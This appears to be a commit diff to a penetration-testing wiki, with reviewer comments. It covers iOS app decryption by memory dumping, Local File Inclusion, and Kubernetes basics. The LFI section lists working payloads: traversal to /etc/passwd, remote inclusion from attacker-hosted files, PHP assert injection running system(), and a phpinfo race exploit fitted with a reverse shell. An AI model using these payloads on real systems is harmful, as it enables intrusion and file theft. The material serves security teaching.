GitBook: [master] 3 pages and 8 assets modified

This commit is contained in:
CPol 2021-04-30 12:16:33 +00:00 committed by gitbook-bot
parent 8cb860d13c
commit c6787fa07b
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
9 changed files with 162 additions and 17 deletions

View file

@ -57,10 +57,80 @@ Note that **applications signed by the same signing certificate can share resour
## Obfuscation
Unlike an Android Application, the binary of an iOS app **can only be disassembled** and not decompiled.
When an application is submitted to the app store, Apple first verifies the app conduct and before releasing it to the app-store, **Apple encrypts the binary**. So the binary download from the app store is encrypted complicating ting the reverse-engineering tasks.
When an application is submitted to the app store, Apple first verifies the app conduct and before releasing it to the app-store, **Apple encrypts the binary using** [**FairPlay**](https://developer.apple.com/streaming/fps/). So the binary download from the app store is encrypted complicating ting the reverse-engineering tasks.
However, note that there are other **third party software that can be used to obfuscate** the resulting binaries.
### Removing App Store Encryption
In order to run the encrypted binary, the device needs to decrypt it in memory. Then, it's possible to **dump the decrypted binary from the memory**.
First, check if the binary is compiled with the PIE \(Position Independent Code\) flag:
```bash
otool -Vh Original_App #Check the last word of the last line of this code
Home:
Mach header
magic cputype cpusubtype caps filetype ncmds sizeofcmds flags
MH_MAGIC_64 X86_64 ALL 0x00 EXECUTE 47 6080 NOUNDEFS DYLDLINK TWOLEVEL PIE
```
If it's set you can use the script [`change_macho_flags.py`](https://chromium.googlesource.com/chromium/src/+/49.0.2623.110/build/mac/change_mach_o_flags.py) to remove it with python2:
```bash
python change_mach_o_flags.py --no-pie Original_App
otool -Vh Hello_World
Hello_World:
Mach header
magic cputype cpusubtype caps filetype ncmds sizeofcmds flags
MH_MAGIC ARM V7 0x00 EXECUTE 22 2356 NOUNDEFS DYLDLINK TWOLEVEL MH_NO_HEAP_EXECUTION
```
Now that the PIE flag isn't set, the OS will load the program at a **fixed starting location** every-time. In order to find this **location** you can use:
```bash
otool -l Original_App | grep -A 3 LC_SEGMENT | grep -A 1 __TEXT
segname __TEXT
vmaddr 0x00001000
```
Then, it's necessary to extract the the memory range that needs to be dumped:
```bash
otool -l Original_App | grep -A 4 LC_ENCRYPTION_INFO
cmd LC_ENCRYPTION_INFO
cmdsize 20
cryptoff 4096
cryptsize 4096
cryptid 0
```
The value of **`cryptoff`** indicated the starting address of the encrypted content and the **`cryptsize`** indicates the size of the encrypted content.
So, the `start address` to dump will be `vmaddr + cryptoff` and the `end address` will be the `start address + cryptsize`
In this case: `start_address = 0x1000 + 0x1000 = 0x2000` __and `end_address = 0x2000 + 0x1000 = 0x3000`
With this information it's just necessary to run the application in the jailbroken device, attach to the process with gdb \(`gdb -p <pid>`\) and dump the memory:
```bash
dump memory dump.bin 0x2000 0x3000
```
Congrats! You have decrypted the encrypted section in dump.bin. Now **transfer this dump to your computer and overwrite the encrypted section with the decrypted** one:
```bash
dd bs=1 seek=<starting_address> conv=notrunc if=dump.bin of=Original_App
```
There is one more step to complete. The application is still **indicating** in its metadata that it's **encrypted**, but it **isn't**. Then, when executed, the device will try to decrypt the already decrypted section and it's going to fail.
However, you can use tools like [**MachOView**](https://sourceforge.net/projects/machoview/) to change this info. Just open the binary and set the **cryptid** to 0:
![](../.gitbook/assets/image%20%28458%29.png)
### Removing App Store Encryption Automatically
You can use tools like [**Clutch**](https://github.com/KJCracks/Clutch) to automatically remove the encryption and an app.
## IPA Reversing
`.ipa` files are zipped packages, so change the extension to `.zip` and decompress them. After decompressing them you should see an `.app` folder. This **folder contains the files of the application**.
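Review bot: the LC_ENCRYPTION_INFO sample in this hunk shows `cryptid 0`, which contradicts the later step that tells the reader to open MachOView and set `cryptid` to 0 because the binary is "still indicating that it's encrypted"; a binary that still needs dumping shows `cryptid 1`, so either the sample output or the explanation should change. The two `otool -Vh` listings also come from different binaries (`Original_App`, x86_64 vs `Hello_World`, ARM v7), which makes the before/after comparison of the PIE flag hard to follow; the link text says `change_macho_flags.py` while the file and the command below it are `change_mach_o_flags.py`; and the `dd` line's `seek=<starting_address>` should say explicitly that this is the file offset `cryptoff` (4096 in the example), since `dd` seeks within the file and not at the `vmaddr`-based address used for the gdb dump. Smaller wording issues carried into the new text: the FairPlay sentence keeps the old "complicating ting", "extract the the memory range", "indicated" for "indicates", a stray `__` before "and" in the start/end address line, and "remove the encryption and an app" for "of an app".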
@ -88,7 +158,77 @@ DVIA-v2:
[...]
```
#### Check if the app is encrypted
See if there is any output for:
```bash
otool -l <app-binary> | grep -A 4 LC_ENCRYPTION_INFO
```
#### Disassembling the binary
Disassemble the text section:
```bash
otool -tV DVIA-v2
DVIA-v2:
(__TEXT,__text) section
+[DDLog initialize]:
0000000100004ab8 sub sp, sp, #0x60
0000000100004abc stp x29, x30, [sp, #0x50] ; Latency: 6
0000000100004ac0 add x29, sp, #0x50
0000000100004ac4 sub x8, x29, #0x10
0000000100004ac8 mov x9, #0x0
0000000100004acc adrp x10, 1098 ; 0x10044e000
0000000100004ad0 add x10, x10, #0x268
```
To print the **Objective-C segment** of the sample application one can use:
```bash
otool -oV DVIA-v2
DVIA-v2:
Contents of (__DATA,__objc_classlist) section
00000001003dd5b8 0x1004423d0 _OBJC_CLASS_$_DDLog
isa 0x1004423a8 _OBJC_METACLASS_$_DDLog
superclass 0x0 _OBJC_CLASS_$_NSObject
cache 0x0 __objc_empty_cache
vtable 0x0
data 0x1003de748
flags 0x80
instanceStart 8
```
In order to obtain a more compact Objective-C code you can use [**class-dump**](http://stevenygard.com/projects/class-dump/):
```bash
class-dump some-app
//
// Generated by class-dump 3.5 (64 bit).
//
// class-dump is Copyright (C) 1997-1998, 2000-2001, 2004-2013 by Steve Nygard.
//
#pragma mark Named Structures
struct CGPoint {
double _field1;
double _field2;
};
struct CGRect {
struct CGPoint _field1;
struct CGSize _field2;
};
struct CGSize {
double _field1;
double _field2;
};
```
However, the best options to disassemble the binary are: [**Hopper**](https://www.hopperapp.com/download.html?) and [**IDA**](https://www.hex-rays.com/products/ida/support/download_freeware/).
## Testing
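Review bot: "See if there is any output for" `otool -l <app-binary> | grep -A 4 LC_ENCRYPTION_INFO` is not a reliable encryption check, because Xcode-built iOS binaries carry an LC_ENCRYPTION_INFO / LC_ENCRYPTION_INFO_64 load command even when they are not encrypted; what matters is the `cryptid` field (1 = encrypted, 0 = not), which the previous section of this same page already explains. Suggest rewording to "Check the `cryptid` value in the output of:". A smaller consistency point: the `class-dump some-app` example would be easier to follow as `class-dump DVIA-v2`, matching the `otool` examples around it, and the struct listing it prints is the tool's own output, so it does not need the ``` fence to be tagged `bash`.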

View file

@ -45,7 +45,7 @@ Check the LFI list of linux.
## Basic LFI and bypasses
All the examples are for Local File Inclusion but could be applied to Remote File Inclusion also \(page=http://myserver.com/phpshellcode.txt\).
All the examples are for Local File Inclusion but could be applied to Remote File Inclusion also \(page=[http://myserver.com/phpshellcode.txt\](http://myserver.com/phpshellcode.txt\)\).
```text
http://example.com/index.php?page=../../../etc/passwd
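Review bot: the reformatted link on the second line is malformed: the escaped backslash inside `[http://myserver.com/phpshellcode.txt\](http://myserver.com/phpshellcode.txt\)` leaves a literal `\` in both the link text and the link target, so the rendered link points at `...phpshellcode.txt\` and the closing `\)` of the parenthetical is consumed by the URL. Keep the previous plain-text form `\(page=http://myserver.com/phpshellcode.txt\)` or wrap the URL in backticks so GitBook does not auto-link it.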
@ -130,7 +130,7 @@ http://example.com/index.php?page=\\attacker.com\shared\mal.php
## Top 25 parameters
Heres list of top 25 parameters that could be vulnerable to local file inclusion \(LFI\) vulnerabilities \(from [link](https://twitter.com/trbughunters/status/1279768631845494787)\):
Heres list of top 25 parameters that could be vulnerable to local file inclusion \(LFI\) vulnerabilities \(from [link](https://twitter.com/trbughunters/status/1279768631845494787)\):
```text
?cat={payload}
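Review bot: the two lines in this hunk are identical apart from whitespace; since the line is being rewritten anyway, "Heres list of top 25 parameters" should read "Here's a list of the top 25 parameters".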
@ -255,7 +255,7 @@ And you can compile the `phar` executing the following line:
php --define phar.readonly=0 create_path.php
```
A file called `test.phar` will be generated that you can use to abuse the LFI.
A file called `test.phar` will be generated that you can use to abuse the LFI.
If the LFI is just reading the file and not executing the php code inside of it, for example using functions like _**file\_get\_contents\(\), fopen\(\), file\(\) or file\_exists\(\), md5\_file\(\), filemtime\(\) or filesize\(\)**_**.** You can try to abuse a **deserialization** occurring when **reading** a **file** using the **phar** protocol.
For more information read the following post:
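Review bot: whitespace-only change on the `test.phar` line, but the paragraph right after it is a sentence fragment: "If the LFI is just reading the file ... filemtime() or filesize()." stops before its main clause. Suggest joining it with the next sentence, e.g. "..., filemtime() or filesize(), you can try to abuse a deserialization that occurs when the file is read through the phar protocol."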
@ -267,17 +267,23 @@ For more information read the following post:
If you encounter a difficult LFI that appears to be filtering traversal strings such as ".." and responding with something along the lines of "Hacking attempt" or "Nice try!", an 'assert' injection payload may work.
A payload like this:
```
```text
' and die(show_source('/etc/passwd')) or '
```
will successfully exploit PHP code for a "file" parameter that looks like this:
```
```text
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");
```
It's also possible to get RCE in a vulnerable "assert" statement using the system() function:
```
It's also possible to get RCE in a vulnerable "assert" statement using the system\(\) function:
```text
' and die(system("whoami")) or '
```
Be sure to URL-encode payloads before you send them.
## LFI2RCE
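Review bot: this section should state which PHP versions the 'assert' injection applies to: evaluating a string argument passed to `assert()` was deprecated in PHP 7.2 and removed in PHP 8.0, so the `assert("strpos('$file', '..') === false")` pattern is only an injection point on older runtimes, and on PHP 8 the same code is just a string assertion. Also, the fences switched from bare ``` to ```text contain PHP, so tagging them `php` would give highlighting; and the two versions of the "It's also possible to get RCE" line in the hunk differ only in the `system\(\)` escaping, which is fine but makes the diff look larger than it is.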
@ -342,7 +348,7 @@ Set-Cookie: PHPSESSID=i56kgbsq9rm8ndg3qbarhsbm27; path=/
Set-Cookie: user=admin; expires=Mon, 13-Aug-2018 20:21:29 GMT; path=/; httponly
```
In PHP these sessions are stored into _/var/lib/php5/sess\_\[PHPSESSID\]_ files
In PHP these sessions are stored into _/var/lib/php5/sess\_\[PHPSESSID\]\_ files
```text
/var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27.
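Review bot: the new escaping on the session path breaks the italic markup: the line opens with an unescaped `_` before `/var/lib/php5/` but now ends with `\_`, so the italic span never closes and the trailing underscore renders literally. Either escape both or, better, put the path in backticks as `/var/lib/php5/sess_[PHPSESSID]`, which also removes the need to escape the brackets. The `php5` directory is also specific to PHP 5 on Debian-based systems; on current Debian/Ubuntu PHP packages the session directory is `/var/lib/php/sessions`, which is worth noting since the example path below depends on guessing this directory.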
@ -377,13 +383,13 @@ To exploit this vulnerability you need: **A LFI vulnerability, a page where phpi
**Tutorial HTB**: [https://www.youtube.com/watch?v=rs4zEwONzzk&t=600s](https://www.youtube.com/watch?v=rs4zEwONzzk&t=600s)
You need to fix the exploit \(change **=&gt;** for **=&gt;**\). To do so you can do:
You need to fix the exploit \(change **=&gt;** for **=&gt;**\). To do so you can do:
```text
sed -i 's/\[tmp_name\] \=>/\[tmp_name\] =\&gt/g' phpinfolfi.py
```
You have to change also the **payload** at the beginning of the exploit \(for a php-rev-shell for example\), the **REQ1** \(this should point to the phpinfo page and should have the padding included, i.e.: _REQ1="""POST /install.php?mode=phpinfo&a="""+padding+""" HTTP/1.1\r_\), and **LFIREQ** \(this should point to the LFI vulnerability, i.e.: _LFIREQ="""GET /info?page=%s%%00 HTTP/1.1\r --_ Check the double "%" when exploiting null char\)
You have to change also the **payload** at the beginning of the exploit \(for a php-rev-shell for example\), the **REQ1** \(this should point to the phpinfo page and should have the padding included, i.e.: _REQ1="""POST /install.php?mode=phpinfo&a="""+padding+""" HTTP/1.1\r_\), and **LFIREQ** \(this should point to the LFI vulnerability, i.e.: _LFIREQ="""GET /info?page=%s%%00 HTTP/1.1\r --_ Check the double "%" when exploiting null char\)
{% file src="../../.gitbook/assets/lfi-with-phpinfo-assistance.pdf" %}
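Review bot: the instruction "change **=&gt;** for **=&gt;**" is unreadable once rendered, because both sides display as `=>`; only the `sed` line conveys the intent (phpinfo()'s HTML output encodes `=>` as `=&gt;`, so the exploit's `[tmp_name] =>` search string has to become `[tmp_name] =&gt;`). Write the two literals in backticks, e.g. "change `=>` to `=&gt;`", and consider ending the sed replacement with `=\&gt;` rather than `=\&gt` so it spells out the full entity (the prefix still matches, but it reads as a typo). The long sentence about **payload**, **REQ1** and **LFIREQ** is a whitespace-only change here; splitting it into three bullets would make each setting easier to find.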
@ -393,7 +399,7 @@ If uploads are allowed in PHP and you try to upload a file, this files is stored
Then, if have found a LFI vulnerability in the web server you can try to guess the name of the temporary file created and exploit a RCE accessing the temporary file before it is deleted.
In **Windows** the files are usually stored in **C:\Windows\temp\php&lt;&lt;**
In **Windows** the files are usually stored in **C:\Windows\temp\php&lt;&lt;**
In **linux** the name of the file use to be **random** and located in **/tmp**. As the name is random, it is needed to **extract from somewhere the name of the temporal file** and access it before it is deleted. This can be done reading the value of the **variable $\_FILES** inside the content of the function "**phpconfig\(\)**".
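Review bot: the last line of this hunk says the temporary file name can be read from `$_FILES` "inside the content of the function phpconfig()", but the function that prints `$_FILES` (under PHP Variables) is `phpinfo()`, which is also what the preceding section and the exploit rely on; as written it sends readers looking for a function that does not exist. Minor wording on the same line: "the name of the file use to be random" should read "the file name is usually random". On the whitespace-only `C:\Windows\temp\php&lt;&lt;` line, spelling the entity out as a visible placeholder such as `C:\Windows\temp\php<random>` would make clearer that the suffix varies.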
@ -430,6 +436,5 @@ print('[x] Something went wrong, please try again')
[PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion%20-%20Path%20Traversal)
[PayloadsAllTheThings/tree/master/File%20Inclusion%20-%20Path%20Traversal/Intruders](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion%20-%20Path%20Traversal/Intruders)
{% file src="../../.gitbook/assets/en-local-file-inclusion-1.pdf" %}

View file

@ -21,7 +21,7 @@
* **Pod**: Wrapper around a container or multiple containers with. A pod should only contain one application \(so usually, a pod run just 1 container\). The pod is the way kubernetes abstracts the container technology running.
* **Service**: Each pod has 1 internal **IP address** from the internal range of the node. However, it can be also exposed via a service. The **service has also an IP address** and its goal is to maintain the communication between pods so if one dies the **new replacement** \(with a different internal IP\) **will be accessible** exposed in the **same IP of the service**. It can be configured as internal or external. The service also actuates as a **load balancer when 2 pods are connected** to the same service. When a **service** is **created** you can find the endpoints of each service running `kubectl get endpoints`
![](../../.gitbook/assets/image%20%28466%29.png)
![](../../.gitbook/assets/image%20%28467%29.png)
* **Kubelet**: Primary node agent. The component that establishes communication between node and kubectl, and only can run pods \(through API server\). The kubelet doesnt manage containers that were not created by Kubernetes.
* **Kube-proxy**: is the service in charge of the communications \(services\) between the apiserver and the node. The base is an IPtables for nodes. Most experienced users could install other kube-proxies from other vendors.
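Review bot: the only change in this hunk is swapping the service screenshot to `image (467).png`, but two context lines beside it are worth fixing in the same pass: the Pod bullet ends in a dangling "with." ("multiple containers with."), and the Kubelet bullet says it "establishes communication between node and kubectl", whereas the kubelet talks to the API server, as the same sentence's "through API server" implies, not to the `kubectl` client. "doesnt" should be "doesn't" in that bullet as well.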
@ -143,7 +143,7 @@ kubectl apply -f deployment.yml
Each configuration file has 3 parts: **metadata**, **specification** \(what need to be launch\), **status** \(desired state\).
Inside the specification of the deployment configuration file you can find the template defined with a new configuration structure defining the image to run:
![](../../.gitbook/assets/image%20%28458%29.png)
![](../../.gitbook/assets/image%20%28458%29%20%281%29.png)
#### Example of Deployment + Service declared in the same configuration file \(from [here](https://gitlab.com/nanuchi/youtube-tutorial-series/-/blob/master/demo-kubernetes-components/mongo.yaml)\)
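Review bot: the renamed asset `image (458) (1).png` on the changed line should be checked against the iOS page in this same commit, which adds `image (458).png` (the MachOView screenshot) under a different `.gitbook/assets` path; the `(1)` suffix suggests a name collision on upload, so confirm each page still shows the intended screenshot. The context line above also has spec and status reversed: in a Kubernetes object `spec` is the desired state (what should be launched) and `status` is the observed current state, so "status (desired state)" should read "status (current state)", and "what need to be launch" should read "what needs to be launched".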